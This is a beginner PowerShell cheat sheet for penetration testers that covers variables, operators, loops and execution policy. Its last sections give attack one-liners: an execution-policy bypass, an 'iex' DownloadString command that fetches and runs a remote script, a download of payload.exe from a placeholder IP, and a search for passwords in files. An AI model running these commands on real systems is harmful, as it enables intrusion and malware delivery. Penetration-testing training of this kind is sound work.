Powershell Basics

About

This is a pocket guide to PowerShell for penetration testers. Advanced users will get nothing out of this.

Variables

Setting Variables:

$a = get-process

Retrieving values:

$a <enter>

Conditionals

Put conditionals inside {}

Symbol          PowerShell
<               -lt
>               -gt
<=              -le
>=              -ge
==              -eq
!=              -ne
Match String    -like

Get-Process | Where-Object {$_.ProcessName -Like '*con*'}

You can use ? as a short alias for Where-Object:

Get-Process | ? {$_.ProcessName -Like '*con*'}

Loops

Print all elements in $a:

$a | foreach {$_}

To execute each command returned by the loop, use &:

$a | foreach {& $_} | select -first 5

Assign each element to $x in turn:

foreach ($x in $a) {$x}

General Tips

Split a string on a delimiter into a list:

$_.split(".")
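Putting the Conditionals, Loops and split pieces together, here is an added example that is not part of the original guide: a small process-inventory function for triage that filters with -like and -gt inside a Where-Object block, guards against a missing path with -ne, and splits the executable path. The function and parameter names are my own choices.

```powershell
# Added example, not part of the original guide: combines the guide's
# comparison operators, Where-Object (?), foreach, and .Split() in one
# function. Function and parameter names are assumptions, not a standard API.
function Get-ProcessInventory {
    param(
        [string]$NamePattern = '*',   # wildcard pattern matched with -like
        [int]$MinWorkingSetMB = 50    # memory threshold compared with -gt
    )

    # $_ is the current pipeline object inside the {} script block
    Get-Process |
        ? { $_.ProcessName -like $NamePattern -and ($_.WorkingSet64 / 1MB) -gt $MinWorkingSetMB } |
        foreach {
            # .Path is $null for some system processes; test with -ne before splitting
            if ($null -ne $_.Path) {
                $parts = $_.Path.Split('\')
                $dir   = $parts[0..($parts.Length - 2)] -join '\'
            } else {
                $dir = '<no path>'
            }
            [pscustomobject]@{
                Name         = $_.ProcessName
                Id           = $_.Id
                WorkingSetMB = [math]::Round($_.WorkingSet64 / 1MB)
                Directory    = $dir
            }
        }
}

# Usage: processes whose name contains "host" and use more than 100 MB,
# then a foreach loop over the results as in the Loops section
$report = Get-ProcessInventory -NamePattern '*host*' -MinWorkingSetMB 100
foreach ($p in $report) { "{0} ({1}) in {2}" -f $p.Name, $p.Id, $p.Directory }
```

Comparing the Directory column against the expected system locations is a quick way to spot a process running from an unusual path.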

Get the current PowerShell version:

$PSVersionTable

Run an older version of PowerShell:

powershell -version <version number>

Execution Policy

Execution policy is not a security protection. It is very easily bypassed. You can run PowerShell with the -noprofile switch to do so. You can also change the execution policy using:

Bypass execution policy when running a script:

Get-Content C:\temp\script.ps1 | powershell.exe -noprofile -

Get execution policy:

Get-ExecutionPolicy -List

Set execution policy:

Set-ExecutionPolicy -Scope 

Download and Run:

powershell -nop "iex (New-Object Net.WebClient).DownloadString('http://example.com/script.ps1')"
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://<IP>:<port>/payload.exe','payload.exe')"

Linux to PowerShell

Cat: Get-Content

Grep: Select-String -Pattern "password"
